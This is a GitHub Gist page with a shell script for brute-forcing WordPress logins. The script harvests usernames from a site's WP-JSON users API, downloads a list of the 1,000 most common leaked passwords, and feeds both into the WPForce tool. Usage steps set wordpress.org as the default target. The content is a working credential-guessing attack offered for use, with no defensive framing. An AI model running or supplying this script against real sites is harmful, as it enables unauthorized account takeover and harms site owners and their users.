Last active
July 1, 2024 18:01
-
-
Save avilum/3d660747541ab128fe568eb49f8b64ba to your computer and use it in GitHub Desktop.
Bruteforce Wordpress Website Using WP-JSON Users API, With 1000 With Top Common Passwords
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This file can be saved as 'bruteforce_wordpress_users.sh' | |
| # | |
| # Requirements: | |
| # - python2 (with requests) | |
| # - jq | |
| # - wget | |
| # - WPForce | |
| # 1. Cloning WPForce: | |
| # git clone https://github.com/n00py/WPForce.git && cd ./WPForce | |
| # 2. Install Requests: | |
| # python2 -m pip install requests (or pip install requests) | |
| # | |
| # Usage: | |
| # 1. Save this file as "bruteforce_wordpress_users.sh" and chmod +x to allow script execution. | |
| # 2. Run: | |
| # WP_DOMAIN=wordpress.org ./bruteforce_wordpress_users.sh | |
| # | |
| #!/bin/sh | |
| # Defining the URLs | |
| BASE_URL="https://${WP_DOMAIN:='wordpress.org'}/" | |
| USERS_URL="$BASE_URL/wp-json/wp/v2/users" | |
| # Getting the users from the WP-JSON REST API | |
| wget -q -O- $USERS_URL | jq '.[] | .slug' > usr.txt | |
| # Getting the top 1k used passwords (leaked) | |
| wget -q -O- https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10-million-password-list-top-1000.txt > pwd.txt | |
| # Run The Scan. | |
| python2 wpforce.py -i $(pwd)/usr.txt -w $(pwd)/pwd.txt -u $BASE_URL |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment